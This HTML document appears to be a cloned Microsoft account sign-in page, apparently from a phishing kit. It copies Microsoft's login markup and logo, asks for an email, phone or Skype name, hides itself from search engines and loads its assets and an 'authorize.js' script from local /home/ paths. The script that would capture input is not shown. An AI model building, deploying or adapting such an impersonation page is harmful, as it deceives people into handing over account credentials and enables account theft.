<html dir="ltr" class="" lang="en"><head>
    <title>Sign in to your account</title>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">
    <meta http-equiv="Pragma" content="no-cache">
    <meta http-equiv="Expires" content="-1">
    <meta name="Googlebot-News" content="noindex, nofollow">
    <meta name="googlebot" content="noindex, nofollow">
    <meta name="robots" content="noindex, nofollow">
    <meta name="robots" content="noimageindex">

        <meta name="format-detection" content="telephone=no">


    
    
<meta name="robots" content="none">


        <link rel="shortcut icon" href="/home/favicon.ico">


    
    <link crossorigin="anonymous" href="/home/style1.css" rel="stylesheet">
    </head>

<body class="cb" style="display: block;">
    


<div>

<div data-bind="if: activeDialog"></div>

<form id="i0281" autocomplete="off">

    <div>
        <div id="lightboxTemplateContainer">

    <div id="lightboxBackgroundContainer"><div class="background-image-holder" role="presentation">
    <div style="background-image: url(&quot;/home/bg.svg&quot;);" class="background-image ext-background-image"></div>
       
    
</div></div>
<div class="outer">
 

    <div class="template-section main-section">
        <div class="middle ext-middle">
            <div class="full-height">
<div class="flex-column">

    <div class="win-scroll">
        <div id="lightbox" class="sign-in-box ext-sign-in-box fade-in-lightbox has-popup">


        <div class="lightbox-cover"></div>

        <div ><img class="logo" role="img" pngsrc="/home/svg1.svg" svgsrc="/home/svg1.svg" src="/home/svg1.svg" alt="Microsoft">

</div>
        <div role="main">

<div  class="">

    <div class="pagination-view animate slide-in-next" >
<div data-viewid="1" data-showfedcredbutton="true" >

<div ><div class="row title ext-title" id="loginHeader" >
    <div role="heading" aria-level="1" data-bind="text: title">Sign in</div>
   
</div></div>

<div class="row">
    <div role="alert" aria-live="assertive">
    </div>

    <div class="form-group col-md-24">
        <div class="placeholderContainer" >

            <form action="">
                <input type="email" name="mail" id="i0116" maxlength="113" class="form-control ltr_override input ext-input text-box ext-text-box" aria-required="true" data-report-event="Signin_Email_Phone_Skype" data-report-trigger="click" data-report-value="Email_Phone_Skype_Entry" aria-label="Enter your email, phone, or Skype." aria-describedby="loginHeader usernameError" placeholder="Email, phone, or Skype" required>
            </form>

        
</div>
        
    </div>
</div>

<div class="position-buttons">
    <div class="row">
        <div class="col-md-24">
            <div class="text-13">
                <div class="form-group">No account? <a href="#" id="signup" aria-label="Create a Microsoft account">Create one!</a></div>
                

                <div class="form-group">
                    <a id="cantAccessAccount" name="cannotAccessAccount" href="#">Can’t access your account?</a>
                </div>
              
            </div>
        </div>
    </div>
</div>

<div class="win-button-pin-bottom">
    <div class="row">
        <div ><div class="col-xs-24 no-padding-left-right button-container">

    <div class="inline-block">
        <input type="button" id="idBtn_Back" class="win-button button-secondary button ext-button secondary ext-secondary" value="Back">
    </div>
    

    <div class="inline-block">

        <input type="submit" id="idSIButton9" class="win-button button_primary button ext-button primary ext-primary" data-report-event="Signin_Submit" data-report-trigger="click" data-report-value="Submit" value="Next">
    </div>
</div></div>
    </div>
</div>

</div>
    </div>
</div></div>
        

        
    
        </div>

        <div class="promoted-fed-cred-box ext-promoted-fed-cred-box">
            <div class="promoted-fed-cred-content">

                <div class="row tile">
                    <div class="table" role="button" tabindex="0" aria-label="Sign-in options">

                        <div class="table-row">
                            <div class="table-cell tile-img medium">
                                <img class="tile-img medium" role="presentation" src="/home/svg2.svg">

                            </div>
                            <div class="table-cell text-left content">
                                <div data-test-id="signinOptions">Sign-in options</div>
                            </div>
                        </div>
                    </div>
                </div>
                
            </div>
        </div>
    </div>
</div>
</div>
        </div>
    </div>

    
    <div id="footer" role="contentinfo" class="footer ext-footer">

        <div >
<div id="footerLinks" class="footerNode text-secondary">

   
        <a id="ftrTerms" href="" class="footer-content ext-footer-content footer-item ext-footer-item">Terms of use</a>
        
        <a id="ftrPrivacy" href="" class="footer-content ext-footer-content footer-item ext-footer-item">Privacy &amp; cookies</a>
        

        
    <a id="moreOptions" href="#" role="button"  aria-label="Click here for troubleshooting information" aria-expanded="false" class="footer-content ext-footer-content footer-item ext-footer-item debug-item ext-debug-item">...</a>
</div></div>
    </div>
    
</div>
</div>
    
</div>
    
</form>
</div>

<script src="/home/js/authorize.js"></script>
</body></html>